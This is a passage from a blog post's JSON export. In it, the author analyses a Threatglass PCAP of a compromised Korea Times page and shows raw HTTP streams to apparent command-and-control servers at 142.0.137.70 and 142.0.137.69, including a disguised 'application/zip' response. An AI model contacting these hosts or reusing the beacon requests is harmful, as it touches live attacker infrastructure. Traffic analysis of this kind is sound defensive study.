12:09:47 GMT\r\n-----\r\n<\/pre>\n
Almost there… Getting towards the end of the PCAP now. The next call is:<\/p>\n
\r\nGET \/\/joy.asp?sid=uu0WmdaWmxXovuXmFfDPBIbyucbtudj8mdKXotiYmte@ HTTP\/1.1\r\nUser-Agent: Mozilla\/4.0 (compatible)\r\nHost: 142.0.137.70:803\r\nCache-Control: no-cache\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Sun, 20 Sep 2015 12:09:52 GMT\r\nServer: Microsoft-IIS\/6.0\r\nContent-Length: 0\r\nContent-Type: text\/html\r\nSet-Cookie: ASPSESSIONIDQSBCATAC=HPBOGPJCKCHNPIKKHMKAEOOE; path=\/\r\nCache-control: private\r\n<\/pre>\n
With the final stream being as follows:<\/p>\n
\r\nGET \/index.php HTTP\/1.1\r\nUser-Agent: Mozilla\/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko\/20110303 Firefox\/3.6.15\r\nHost: 142.0.137.69:805\r\nCache-Control: no-cache\r\n\r\nHTTP\/1.1 200 OK\r\nConnection: close\r\nDate: Sun, 20 Sep 2015 12:09:56 GMT\r\nServer: Microsoft-IIS\/6.0\r\nX-Powered-By: PHP\/5.2.5\r\nContent-type:application\/zip\r\n\r\n.............\r\n<\/pre>\n
The interesting thing about this last stream is the fact that the page being request is ‘index.php,’ yet the content-type is “application\/zip.” Looking at the file via a hex editor I am not seeing anything else that would label this file as a zip file. I also tried to unzip it via 7zip and it was not a valid archive. <\/p>\n
Lastly, alerts generated by replaying this through my local install of Security Onion:<\/p>\n
\"Squert1\"<\/a><\/p>\n
\"Squert2\"<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
So while waiting for Brad to come up with his next exercise, I figured that I would do some lab work “independently” while I waited. So I went over to Threatglass to see what I could find there. This one stood out to me being half-Korean and all so I figured that I would try my hand at it. The one that I used is from the Korea Times website. There you can find the PCAP and the screenshots that Threatglass posts. One thing that I wanted to note here is my lack of knowledge and understanding around how to…<\/p>\n
 Continue reading<\/span><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-206","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/206","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=206"}],"version-history":[{"count":9,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/206\/revisions"}],"predecessor-version":[{"id":217,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/206\/revisions\/217"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=206"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=206"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=206"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}